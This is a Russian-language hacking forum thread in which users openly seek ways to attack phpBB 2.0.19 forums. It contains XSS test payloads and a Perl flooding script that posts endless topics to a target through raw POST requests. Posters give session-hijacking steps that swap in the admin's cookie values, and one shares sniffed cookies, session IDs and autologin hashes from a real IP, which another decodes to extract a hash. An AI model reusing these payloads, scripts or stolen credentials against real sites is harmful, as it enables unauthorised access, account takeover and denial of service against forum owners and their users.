Привет всем! ВОт такая проблема,хочу сломать форум но на нео нету ни одного эксплойта,начал изучать как составлять атаки xss,но не полностью понял о чем идет ресь,хочу чтобы вы мне поомгли в этом,скажите как для этих форумов можно составить xss атаку,я пробовал "><script>alert()</script> чтобы попробовать это я регистрируюсь на форуме вхожу в сосданную тему и отвечаю вот таким вот образом(выше),ничего не происходит,посомтрел фильтр имеет дырки или нет,пробовал '';!--"<exp>=&{()} вошел в соурс чтобы посмотреть как фильтр реагирует а там '';!--"<fuck>=&{()} вот что,я так понял дырок фильтр не имеет так как он заменил <> на другие символы,в статье HakNet (http://forum.antichat.ru/thread20140.html) как раз оттуда я все прочитал,все это написано для старых версий и на новые не проходит,я просто новичек в этом деле хочу чтобы вы немного профснили мне чсто дальше делать если фильтр фильтрует все это,что в этом случае предпринять?Если кто сможет привести пример xss атаки для форумов phpbb 2.0.19 я буду очень благодарен и как раз смогу понять в чем моя ошибка?Вернее что я должен был предпринять дальше,и впринципе все проясниться,даьше смогу сам составлять xss атаки.Спасибо заранее!! Тока пожалуйста не ругайтесь!!)) Спасибо!!
phpbb 2.0.18+ .. точно не знаю версию. стянул сессию. меняю в куках phpbb2mysql_sid (что-то подобное), потом перезагружаю страницу. в итоге просто выкидывает.. подскажите в чем проблема может быть
Ьебята, здесь сплоит не давно выкладывали на форуме. Может попробуете : Code: #!/usr/bin/perl print q{ __________________________________________________ _______________________ >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>| / \ \ \ ,, / / '-.`\()/`.-' .--_'( )'_--. / /` /`""`\ `\ \ * SpiderZ ForumZ Security * | | >< | | \ \ / / '.__.' => Exploit phpBB 2.0.19 ( by SpiderZ ) => Topic infinitely exploit => Sito: www.spiderz.tk __________________________________________________ _______________________ >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>| }; use IO::Socket; ## Initialized X $x = 0; ## Exploit phpbb 2.0.19 SpiderZ print q( Exploit phpBB 2.0.19 ( by SpiderZ ) ); print q( => Scrivi l'url del sito senza aggiungere http & www => Url: ); $host = <STDIN>; chop ($host); print q( => Adesso indica in quale cartella e posto il phpbb => di solito si trova su /phpBB2/ o /forum/ => Cartella: ); $pth = <STDIN>; chop ($pth); print q( => Occhio usa un proxy prima di effettuare l'attacco => il tuo ip verra spammato sul pannello admin del forum => Per avviare l'exploit scrivi " hacking " => ); $type = <STDIN>; chop ($type); ## Search exploit phpbb by SpiderZ if($type == 1){ ## Search exploit phpbb by SpiderZ while($x != 0000) { ## Search exploit phpbb by SpiderZ $x++; } ## Nome attack Hacking } elsif ($type == hacking){ ## Search exploit phpbb by SpiderZ while($x != 10000) { ## Invia Search exploit phpbb by SpiderZ $postit = "post=Hacking$x+&username=Exploit&subject=Exploit_phpbb_2.0.19&message=Topic infinitely exploit phpBB 2.0.19"; ## Posit Length $lrg = length $postit; ## Connect Socket with Variables Provided By User my $sock = new IO::Socket::INET ( PeerAddr => "$host", PeerPort => "80", Proto => "tcp", ); die "\nConnessione non riuscita: $!\n" unless $sock; ## Invia Search exploit phpbb by SpiderZ print $sock "POST $pth"."posting.php?mode=newtopic&f=1 HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; close($sock); ## exploit phpbb by SpiderZ syswrite STDOUT, "."; ## exploit phpbb by SpiderZ $x++; } }else{ ## Error Exploit phpbb die " Error ! riprova... \n"; }
n3r0bi0m4n, стираешь из куков sid вообще напрочь, меняешь pass_hash на админовский, и id на админовский, перезаходишь и всё.
вот то что наснифилось IP: 82.200.251.183 QUERY: phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"353cb7bc17a426dfe6670e0d95257dfa";s:6:"userid";i:2330;}; phpbb2mysql_lastid=2330; cpg133_data=YTozOntzOjI6IklEIjtzOjMyOiJlZWRlZmVkZTNlZjUwY2FmMDc1YmEyZjg0NDg0ZTdjYyI7czoyOiJhbSI7aToxO3M6MzoibGl2IjthOjI6e2k6MDtzOjM6IjM3NCI7aToxO3M6MzoiMzY1Ijt9fQ==; PHPSESSID=11a3cb062053fcd93dc542a9341a0ee3; b=b; hotlog=1; phpbb2mysql_sid=414adeefacfbf42030f6d3b78b1ba695 REFERER: ***='<script src="***/script.js"></script> AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; MRA 4.8 (build 01709); .NET CLR 1.1.4322) эм.. а де тут хэш? =)
В переводе с Base64 имеем: Code: cpg133_data=a:3:{s:2:\"ID\";s:32:\"eedefede3ef50caf075ba2f84484e7cc\";s:2:\"am\";i:1;s:3:\"liv\";a:2:{i:0;s:3:\"374\";i:1;s:3:\"365\";}} Отсюда, хэш eedefede3ef50caf075ba2f84484e7cc